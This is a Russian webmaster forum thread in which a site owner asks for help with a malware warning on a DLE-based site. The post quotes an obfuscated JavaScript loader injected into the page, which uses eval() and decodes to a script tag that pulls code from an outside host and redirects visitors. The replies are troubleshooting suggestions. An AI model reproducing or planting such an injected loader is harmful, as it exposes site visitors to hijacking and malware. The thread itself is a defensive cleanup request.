Обнаружено вредоносное ПО
Страницы: 1 2 След.
Обнаружено вредоносное ПО
Здравствуйте, появилась такая проблема.
Если зайти на сайт raplist.ru через обозреватель Opera, то выходит сразу сообщение "Обнаружено вредоносное ПО" и что сайт подозревается в мошенничестве.

Смотрим исходный код страницы. В самом верху до надписи "<!DOCTYPE html PUBLIC " есть следующее
Код
<!-- Obfuscated by MyObfuscator PRO v2.03 www.myobfuscate.com -->
<sc ript language="javascript" type="text/javascript">var OO1='7kyJ+QHcpdyKnI3Yz9CP+ICO4kjM4ETPkl2PwhGcuMnavQHcpJ3Yz9Sdy5iclRnb1hmZlJ3LvoDc0RHai0zYyNHIiQHcpJ3YTFmdhpkI9U2ZhV3ZuFGbgQHcpdyKnI3YzxzJoUGdpJ3duQnbl1Wdj9GZ';var IIO=["\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4A\x4B\x4C\x4D\x4E\x4F\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5A\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6A\x6B\x6C\x6D\x6E\x6F\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7A\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x2B\x2F\x3D","","\x63\x68\x61\x72\x41\x74","\x69\x6E\x64\x65\x78\x4F\x66","\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65","\x6C\x65\x6E\x67\x74\x68"];function _0lI(O10){var lOI=IIO[0];var _1l0,I0I,_11O,O0l,_1O1,I10,_1IO,lIO,_1OO=0,_0IO=IIO[1];do{O0l=lOI[IIO[3]](O10[IIO[2]](_1OO++));_1O1=lOI[IIO[3]](O10[IIO[2]](_1OO++));I10=lOI[IIO[3]](O10[IIO[2]](_1OO++));_1IO=lOI[IIO[3]](O10[IIO[2]](_1OO++));lIO=O0l<<18|_1O1<<12|I10<<6|_1IO;_1l0=lIO>>16&0xff;I0I=lIO>>8&0xff;_11O=lIO&0xff;if(I10==64){_0IO+=String[IIO[4]](_1l0);}else{if(_1IO==64){_0IO+=String[IIO[4]](_1l0,I0I);}else{_0IO+=String[IIO[4]](_1l0,I0I,_11O);};};} while(_1OO<O10[IIO[5]]);return _0IO;};function lI1(l10){var III=IIO[1],_1OO=0;for(_1OO=l10[IIO[5]]-1;_1OO>=0;_1OO--){III+=l10[IIO[2]](_1OO);};return III;};eval(_0lI(lI1(OO1)));</script>


Не один антивирус не ругается (за исключением встроенного в оперу AVG) И в гугле и в яндеске не написано, что есть вредоносный код.
Но заметил такую вещь, этот код влияет на стиль сайта. Если убрать его в Исходном коде и применить изменения, текст становится таким каким должен был быть изначально. И ещё раз в сутки с 1 IP если нажать на ссылку не кнопкой мыши а, колёсиком, чтобы открыло в новой вкладке страницу, то страницу выбрасывает на чей то сайт (сайты меняются).

в main.tpl чужих кодов нет. Ставил даже очень старый свой main.tpl чтобы проверить, но от него не зависит, так же не зависит от .htaccess.

Не знаю куда обращаться, и не уверен сталкивался ли бы кто-нибудь с этим. Потому что сам впервые наткнулся на такое предупреждение.

Рекламы на сайте нет и не было в этот период.

Пожалуйста помогите.

Прогон по твиттеру, постинг в 1500 аккунтов
Постинг в твиттер аккаунты, для ускорения индексации ваших сайтов, сателлитов, дорвеев.

Я так понимаю, обычный script просто зашифровали через сервис www.myobfuscate.com
Но где и как мне его искать?
смог всё таки расшифровать это байду, вот что выдало:
Код
<sc ript language="JavaScript" src="http://refhunter.ru/script/js.php?id=182988"></script>


Может кто скажет куда такое могли засунуть?
какой движок? попробуйте поискать в index.php
скачайте все файлы на комп и в totalComander поиском найти куски кода
Цитата
daden11 пишет:
какой движок? попробуйте поискать в index.php


Движок DLE 9.3. В index.php нету.
Смотри в папке engine файл engine.php над коментом Формирование speedbar
А может эта ваша партнерка...
ищите инклюд в index.php или main.tpl(не сам код а путь к файлу с ним)
А лучше покажите начала этих файлов тут.
Изменено: Lazun429 - 31 Мая 2011 16:56
Скорее уже в базе. Пробуй фикс: _http://php-yuri.ru/fix.rar
Цитата
Олег пишет:
А может эта ваша партнерка...


исключено.

Цитата
abyss-by пишет:
Скорее уже в базе. Пробуй фикс: _http://php-yuri.ru/fix.rar


Результат: 9075/9074.
Удалено вредоносного кода: 153
Но проблема не решена.

Цитата
Олег пишет:
Смотри в папке engine файл engine.php над коментом Формирование speedbar


спасибо, удалил там какую-то рекламную ссылку, но всё равно это ещё не то что нужно.

Цитата
Lazun429 пишет:
ищите инклюд в index.php или main.tpl(не сам код а путь к файлу с ним)
А лучше покажите начала этих файлов тут.


ничего там не нашел левого smile:(
менял шаблон, проблема не решается, значит к файлам шаба это не относится, дело в самом движке. Скажите где можно ещё поковыряться?
Путь: engine - classes - mysql.php
Скорее всего там.
Цитата
leon_need пишет:
Путь: engine - classes - mysql.php
Скорее всего там.


нету ничего, даже заменял всю эту папку оригиналом с чистого двига, всё равно проблема остается.
Может кэш очистить, может уже вылечили, а кэш старый
Страницы: 1 2 След.
Похожие темы:
Читают тему (гостей: 2, пользователей: 0, из них скрытых: 0)
Новые темыОбъявленияСвободное общение
06:40 Ап 25.09 
06:26 Объявления гугл выходят за пределы страницы. 
06:25 Как влияют на продвижение уникальные статьи из веб-архива 
06:24 Google делает подляну сайту 
01:14 Текстовый апдейт: выложен индекс по 16 сентября 2016 
21:09 Невероятное открытие – Nofollow ссылки улучшают ваши позиции 
21:02 "Белый экран" при попытке установки или обновления компонентов (j3.6.2) 
04:44 Вакансии: Операторы и редакторы по обработке статей из вебархива 
02:57 Оцените игровой портал 
02:29 Женский портал 
02:23 Размещу ваши ссылки на сайте игровой тематики 
01:08 Комплексный прогон сайтов, нет каталогов от shtaketo, хороший рост позиций + Тиц 30 - 100 
01:08 3 совета по Юзабилити и Конверсии / SEO аудит 
19:50 Dark Sender - новая программа для рассылки в Вконтакте 
02:22 "Амнистия" 2016 
02:17 Нужна помощь по Джумла. Решение нескольких вопросов. 
23:55 Склейка доменов: нужна помощь 
22:24 Нужен баннер для популяризации раздела "Интересные темы" (безвозмездно) 
21:49 Есть тут те, кто вообще не умеет создавать сайты и сейчас не имеет ни одного? У кого не было первого раза? 
21:37 Халява, почти. Текст более 3 млн.сим., ~200 тИЦ, до 10 тыс.твиттер прогон (значения указаны суммарно) БЕСПЛАТНО 
21:11 Доска объявлений ищет нового хозяина